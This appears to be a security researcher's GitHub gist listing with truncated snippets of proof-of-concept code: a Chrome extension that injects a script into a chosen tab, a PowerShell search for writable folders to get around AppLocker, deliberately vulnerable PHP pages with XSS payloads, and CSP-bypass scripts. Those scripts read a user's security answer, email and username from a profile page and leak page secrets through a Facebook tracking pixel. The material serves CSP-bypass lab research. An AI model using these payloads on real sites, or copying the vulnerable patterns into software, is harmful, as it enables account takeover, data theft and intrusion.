Felipe Molina felmoltor

@felmoltor
felmoltor / background.js
Created July 3, 2025 10:48
Dummy PoC to use extension to break restrictions from a phishing page
chrome.runtime.onMessage.addListener((message, sender, sendResponse) => {
console.log("Background script received message:", message);
if (message.action === "inject_poc") {
chrome.tabs.query({}, function(tabs) {
const targetTab = tabs.find(tab => tab.title.includes("Target Page"));
if (targetTab) {
chrome.scripting.executeScript({
target: { tabId: targetTab.id },
files: ["injected.js"]
});
@felmoltor
felmoltor / Search-Writable.ps1
Created November 23, 2023 10:19
Search writable folders and network shares without "accesschk.exe"
# Author: Felipe Molina de la Torre
# Date: November 2023
# Summary: Accesschk-like script, but without using external executable files like "accesschk.exe".
# It shows you the folders and executables where your user has write permissions and why.
# This is useful for systems where AppLocker is in place and you cannot execute arbitrary exes but you can execute PowerShell.
# Class to store permissions
class Permissions {
[string]$GroupName
[string]$SID
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret #1 vuln
// GET /secret.php?msg=This%20is%20an%20error";alert("hello%20xss");var%20foo="var
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
function displayError(){
document.getElementById('error-div').innerText="Error 1005: This is an error";alert("Hello xss");var foo="var";
}
displayError();
</script>
// […]
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:47
secret 2 vuln
// GET /secret.php?source=js/debug.js
// […]
<script defer nonce="ceT7vflNlU8YT58gnQnZH4xi">
const urlParams = new URLSearchParams(window.location.search);
const source = urlParams.get('source');
var s=document.createElement("script");
s.src=source;
document.head.appendChild(s);
</script>
@felmoltor
felmoltor / secret.php
Last active August 23, 2023 20:42
secret
<?php
if (isset($_GET["msg"])){
$errorMsg = "Error 1005: ".$_GET["msg"];
}
else{
$errorMsg="";
}
?>
'use strict';
export const handler = async (event) => {
const response = {
statusCode: 200,
headers: {
'Content-Type': 'text/html',
},
body: event.queryStringParameters.data,
};
var decoded=Buffer.from(event.queryStringParameters.data, 'base64').toString('ascii');
@felmoltor
felmoltor / PoC-CSP-Bypass-pwn.js
Created August 23, 2023 14:50
Change user password and security answer
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=pd.getElementById('security_question').value;
sa=pd.getElementById('security_answer').value;
email=pd.getElementById('email').value;
username=pd.getElementById('username').value;
@felmoltor
felmoltor / Facebook-exfil-csp.js
Created August 23, 2023 14:45
Facebook CSP Exfiltration
fbq('init', '1179785999289471');
fbq('trackCustom', 'MyEvent-keyfc',{
data: "Secret ingredient is: '"+document.getElementById('secret-ingredient').innerText+"'"
});
@felmoltor
felmoltor / Hotjar-poll-answer.js
Last active August 23, 2023 14:44
PoC for the CSP bypass Lab
fetch('/profile.php').then(function (response) {
return response.text();
}).then(function (html) {
// This is the HTML from our response as a text string
const parser = new DOMParser();
const pd = parser.parseFromString(html, "text/html");
sq=(pd.getElementById('security_question')).value;
sa=(pd.getElementById('security_answer')).value;
var data = {"utk":null, "response_content":"{\"version\":4 ,\"answers\":[{\"questionUuid\":\"78942292\"
,\"answer\":\"Something else\",
console.log("Hello from a gist file hosted in felmoltor's github");